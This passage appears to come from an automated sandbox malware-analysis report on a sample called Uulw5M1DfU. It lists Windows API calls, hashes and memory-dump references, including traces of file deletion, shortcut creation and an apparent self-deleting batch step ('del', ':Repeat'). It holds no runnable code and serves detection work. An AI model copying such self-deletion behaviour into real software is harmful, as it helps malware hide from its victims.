                                                                                                • Opcode Fuzzy Hash: 076169c5b403ddfe74b0b9752022086d8412a0b80d08fe31e2627fee67d73aef
                                                                                                • Instruction Fuzzy Hash: D3C080301443007DED115F505E06B463A916B44717F508065F344540D0C7F484009509
                                                                                                APIs
                                                                                                • ??2@YAPAXI@Z.MSVCRT(000000D0), ref: 0041138D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: ??2@
                                                                                                • String ID:
                                                                                                • API String ID: 1033339047-0
                                                                                                • Opcode ID: 08d588780a3caab37cf70573278ad1822b03e6a84bf609910ea5ba04e31b1b9c
                                                                                                • Instruction ID: d5b8b2b556814232dc2945b8f7e5995fed121ff751d048b21687cc00dda573f5
                                                                                                • Opcode Fuzzy Hash: 08d588780a3caab37cf70573278ad1822b03e6a84bf609910ea5ba04e31b1b9c
                                                                                                • Instruction Fuzzy Hash: B4B0123438914504FE5413B208013FB01800F40303F10087B5B02E4DF9FD0884805139
                                                                                                APIs
                                                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,0040E561,?,00000004,0040E5B0,?,?,004117E5,?), ref: 00401B2A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: FreeVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 1263568516-0
                                                                                                • Opcode ID: 727c456c664ec040fae2a494910ef8e866b16c48e489126d85a402f0e100615f
                                                                                                • Instruction ID: 5381ed20748db0b7fd93371e38984c83fa4171db9cf80dc6a42123bab5888d64
                                                                                                • Opcode Fuzzy Hash: 727c456c664ec040fae2a494910ef8e866b16c48e489126d85a402f0e100615f
                                                                                                • Instruction Fuzzy Hash: 45A002305446007ADE515B10DD05F457F516744B11F20C5547155540E586755654DA09
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: free
                                                                                                • String ID:
                                                                                                • API String ID: 1294909896-0
                                                                                                • Opcode ID: d9246d09a93a321ccd45a7f77b4b3a05b9734a8e70a1dc2b954ba7e43b8076d7
                                                                                                • Instruction ID: 7baee4be7330d58fba6a4d3e6254b3dabd4481adb37f3967e502ba2394f26960
                                                                                                • Opcode Fuzzy Hash: d9246d09a93a321ccd45a7f77b4b3a05b9734a8e70a1dc2b954ba7e43b8076d7
                                                                                                • Instruction Fuzzy Hash:
                                                                                                APIs
                                                                                                • _wtol.MSVCRT ref: 004034E5
                                                                                                • SHGetSpecialFolderPathW.SHELL32(00000000,?,CC5BE863,00000000,004177A0,00000000,00417794), ref: 00403588
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 004035F9
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?), ref: 00403601
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 00403609
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?), ref: 00403611
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?), ref: 00403619
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 00403621
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 00403629
                                                                                                • _wtol.MSVCRT ref: 0040367F
                                                                                                • CoCreateInstance.OLE32(00414BF4,00000000,00000001,00414BE4,00404F9B,.lnk,?,0000005C), ref: 00403720
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,0000005C), ref: 004037B8
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,0000005C), ref: 004037C0
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,0000005C), ref: 004037C8
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0000005C), ref: 004037D0
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,0000005C), ref: 004037D8
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,0000005C), ref: 004037E0
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,0000005C), ref: 004037E8
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,0000005C), ref: 004037EE
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,0000005C), ref: 004037F6
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: ??3@$_wtol$CreateFolderInstancePathSpecial
                                                                                                • String ID: .lnk
                                                                                                • API String ID: 408529070-24824748
                                                                                                • Opcode ID: cb1a116a375c0276f3cc47ebae34f017b071fc5c88c5a353f484599fe5934efa
                                                                                                • Instruction ID: c4a1d47ac56633071a1bd2db01059e5edb54ffe0bccc65637149caefe5d2277b
                                                                                                • Opcode Fuzzy Hash: cb1a116a375c0276f3cc47ebae34f017b071fc5c88c5a353f484599fe5934efa
                                                                                                • Instruction Fuzzy Hash: 8EA18A71910219ABDF04EFA1CC46DEEBB79EF44705F50442AF502B71A1EB79AA81CB18
                                                                                                APIs
                                                                                                • GetLastError.KERNEL32(00000000,00000020,?), ref: 00401FEC
                                                                                                • wsprintfW.USER32 ref: 00401FFD
                                                                                                • GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00402012
                                                                                                • GetLastError.KERNEL32 ref: 00402017
                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402032
                                                                                                • GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402045
                                                                                                • GetLastError.KERNEL32 ref: 0040204C
                                                                                                • lstrcmpiW.KERNEL32(00000000,00000020), ref: 00402061
                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00402071
                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000020), ref: 0040208F
                                                                                                • SetLastError.KERNEL32(00000000), ref: 00402098
                                                                                                • lstrlenA.KERNEL32(00413FD0), ref: 004020CC
                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004020E7
                                                                                                • GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402119
                                                                                                • _wtol.MSVCRT ref: 0040212A
                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00413FD0,00000001,00000000,00000002), ref: 0040214A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$??2@??3@EnvironmentVariable$ByteCharInfoLocaleMultiWide_wtollstrcmpilstrlenwsprintf
                                                                                                • String ID: 7zSfxString%d$XpA$\3A
                                                                                                • API String ID: 2117570002-3108448011
                                                                                                • Opcode ID: 332d11925e247980b34bd098e8b038dc96ba1155979fc83484f9ac8f636b93aa
                                                                                                • Instruction ID: 5c0681f152172bce6659d4e02be164ba9bb36eab7c70e8d4f1a0ed4420d73572
                                                                                                • Opcode Fuzzy Hash: 332d11925e247980b34bd098e8b038dc96ba1155979fc83484f9ac8f636b93aa
                                                                                                • Instruction Fuzzy Hash: 11518471604305AFDB209F74DD899DBBBB9EB08345B11407AF646E62E0E774AA44CB18
                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00401BEA
                                                                                                • FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 00401C07
                                                                                                • FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00401C1B
                                                                                                • SizeofResource.KERNEL32(00000000,00000000), ref: 00401C2C
                                                                                                • LoadResource.KERNEL32(00000000,00000000), ref: 00401C36
                                                                                                • LockResource.KERNEL32(00000000), ref: 00401C41
                                                                                                • LoadLibraryA.KERNEL32(kernel32,SetProcessPreferredUILanguages), ref: 00401C6D
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00401C76
                                                                                                • wsprintfW.USER32 ref: 00401C95
                                                                                                • LoadLibraryA.KERNEL32(kernel32,SetThreadPreferredUILanguages), ref: 00401CAA
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00401CAD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: Resource$Load$AddressFindLibraryProc$HandleLockModuleSizeofwsprintf
                                                                                                • String ID: %04X%c%04X%c$SetProcessPreferredUILanguages$SetThreadPreferredUILanguages$kernel32
                                                                                                • API String ID: 2639302590-365843014
                                                                                                • Opcode ID: a5d0d847a20e007311d4afefc35bdd0d1043cb70ace8406c3a5a944bd10805b9
                                                                                                • Instruction ID: 1b367ad183524107b1556f539f271e2bfa11f4d2ebd4ebc35158efee647c5c94
                                                                                                • Opcode Fuzzy Hash: a5d0d847a20e007311d4afefc35bdd0d1043cb70ace8406c3a5a944bd10805b9
                                                                                                • Instruction Fuzzy Hash: 002153B1944318BBDB109FA59D48F9B7FBCEB48751F118036FA05B72D1D678DA008BA8
                                                                                                APIs
                                                                                                • wvsprintfW.USER32(?,00000000,?), ref: 0040779A
                                                                                                • GetLastError.KERNEL32(?,00000000,0000FDE9), ref: 004077AB
                                                                                                • FormatMessageW.KERNEL32(00001100,00000000,00000000,00402A50,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077D3
                                                                                                • FormatMessageW.KERNEL32(00001100,00000000,00402A50,00000000,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077E8
                                                                                                • lstrlenW.KERNEL32(?,?,00000000,0000FDE9), ref: 004077FB
                                                                                                • lstrlenW.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407802
                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,0000FDE9), ref: 00407817
                                                                                                • lstrcpyW.KERNEL32(00000000,?,?,00000000,0000FDE9), ref: 0040782D
                                                                                                • lstrcpyW.KERNEL32(-00000002,00402A50,?,00000000,0000FDE9), ref: 0040783E
                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,0000FDE9), ref: 00407847
                                                                                                • LocalFree.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407851
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: FormatMessagelstrcpylstrlen$??2@??3@ErrorFreeLastLocalwvsprintf
                                                                                                • String ID:
                                                                                                • API String ID: 829399097-0
                                                                                                • Opcode ID: bf60f95a6a1f59c2bb6c04e2e113b9a1b5cd8de0030c6a868400c9436056581d
                                                                                                • Instruction ID: 98041b7e574f1f1c61a73cce3db0a13ad597614178cae5aaf21d0c5f67190c53
                                                                                                • Opcode Fuzzy Hash: bf60f95a6a1f59c2bb6c04e2e113b9a1b5cd8de0030c6a868400c9436056581d
                                                                                                • Instruction Fuzzy Hash: 85218172804209BEDF14AFA0DC85CEB7BACEB04355B10847BF506A7150EB34EE848BA4
                                                                                                APIs
                                                                                                • FindFirstFileW.KERNEL32(?,?,00413454,?,?,?,00000000), ref: 00402BA8
                                                                                                • lstrcmpW.KERNEL32(?,00413450,?,0000005C,?,?,?,00000000), ref: 00402BFB
                                                                                                • lstrcmpW.KERNEL32(?,00413448,?,?,00000000), ref: 00402C11
                                                                                                • SetFileAttributesW.KERNEL32(?,00000000,?,0000005C,?,?,?,00000000), ref: 00402C27
                                                                                                • DeleteFileW.KERNEL32(?,?,?,00000000), ref: 00402C2E
                                                                                                • FindNextFileW.KERNEL32(00000000,00000010,?,?,00000000), ref: 00402C40
                                                                                                • FindClose.KERNEL32(00000000,?,?,00000000), ref: 00402C4F
                                                                                                • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000000), ref: 00402C5A
                                                                                                • RemoveDirectoryW.KERNEL32(?,?,?,00000000), ref: 00402C63
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00402C6E
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00402C79
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$Find$??3@Attributeslstrcmp$CloseDeleteDirectoryFirstNextRemove
                                                                                                • String ID:
                                                                                                • API String ID: 1862581289-0
                                                                                                • Opcode ID: 3adc14f40e23b1cdad4e4199877390cf68653eec517b691feb080405b1435fa2
                                                                                                • Instruction ID: 7ffcf375551190f92b7aba4ef5ef3cd4ed0286f9dec59b0789af02bc25bdcc12
                                                                                                • Opcode Fuzzy Hash: 3adc14f40e23b1cdad4e4199877390cf68653eec517b691feb080405b1435fa2
                                                                                                • Instruction Fuzzy Hash: A321A230500209BAEB10AF61DE4CFBF7B7C9B0470AF14417AB505B11E0EB78DB459A6C
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(uxtheme,?,00407F57,000004B1,00000000,?,?,?,?,?,0040803E), ref: 00406D65
                                                                                                • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 00406D76
                                                                                                • GetWindow.USER32(?,00000005), ref: 00406D8F
                                                                                                • GetWindow.USER32(00000000,00000002), ref: 00406DA5
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$AddressLibraryLoadProc
                                                                                                • String ID: SetWindowTheme$\EA$uxtheme
                                                                                                • API String ID: 324724604-1613512829
                                                                                                • Opcode ID: 249f97bdfab0f17876e9996a58034084f131abf1d363e9cca7f48feb82d9f298
                                                                                                • Instruction ID: f2e0bdee1e376373ef12be0a37c87caa708c4cf78f5ebad58458586032015049
                                                                                                • Opcode Fuzzy Hash: 249f97bdfab0f17876e9996a58034084f131abf1d363e9cca7f48feb82d9f298
                                                                                                • Instruction Fuzzy Hash: 47F0A73274172537C6312A6A6C4CF9B6B9C9FC6B51B070176B905F7280DA6CCD0045BC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ff1f75169f88eb9072603f867e1b9c380318d13f71256e892471df4b1a5f26b0
                                                                                                • Instruction ID: 2cf66fefa79674a345482580870fbecf2b771b639b37e27eb1fc897e4fc9b441
                                                                                                • Opcode Fuzzy Hash: ff1f75169f88eb9072603f867e1b9c380318d13f71256e892471df4b1a5f26b0
                                                                                                • Instruction Fuzzy Hash: 44126E31E00129DFDF08CF68C6945ECBBB2EF85345F2585AAD856AB280D6749EC1DF84
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 6e2407533f79ef22d8e6d794d98aef535f9904e2ced6ea7e6753812806be966d
                                                                                                • Instruction ID: 8743f1180a29be23716da9caa70fae7f7856ace610ba4dfa2102d12747f13ae8
                                                                                                • Opcode Fuzzy Hash: 6e2407533f79ef22d8e6d794d98aef535f9904e2ced6ea7e6753812806be966d
                                                                                                • Instruction Fuzzy Hash: D12129725104255BC711DF1DE8887B7B3E1FFC4319F678A36DA81CB281C629D894C6A0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
                                                                                                • Instruction ID: 7cc7f0f00d3fdf34bc0739e2af2c3edfb6ca911da6c9eaecf720caf4c907201e
                                                                                                • Opcode Fuzzy Hash: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
                                                                                                • Instruction Fuzzy Hash: 0621F53290062587CB12CE6EE4845A7F392FBC436AF134727EE84A3291C62CA855C6A0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: dde32e57196543c58229ec3a92fed9e80e5316f67d8377c6540d091cf30b3fc0
                                                                                                • Instruction ID: 0032c0c3dd355d3b1328166acc4be040b7821e5e83bc1fe28c274bced218c28f
                                                                                                • Opcode Fuzzy Hash: dde32e57196543c58229ec3a92fed9e80e5316f67d8377c6540d091cf30b3fc0
                                                                                                • Instruction Fuzzy Hash: 4EF074B5A05209EFCB09CFA9C49199EFBF5FF48304B1084A9E819E7350E731AA11CF50
                                                                                                APIs
                                                                                                • GetDriveTypeW.KERNEL32(?,?,?), ref: 00404B46
                                                                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00404B77
                                                                                                • WriteFile.KERNEL32(004177C4,?,?,00406437,00000000,del ",:Repeat,00000000), ref: 00404C2C
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 00404C37
                                                                                                • CloseHandle.KERNEL32(004177C4), ref: 00404C40
                                                                                                • SetFileAttributesW.KERNEL32(00406437,00000000), ref: 00404C57
                                                                                                • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00404C69
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 00404C72
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 00404C7E
                                                                                                • ??3@YAXPAX@Z.MSVCRT(00406437,?), ref: 00404C84
                                                                                                • ??3@YAXPAX@Z.MSVCRT(00406437,?,?,?,?,?,?,?,?,?,?,?,?,?,00406437,004177C4), ref: 00404CB2
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
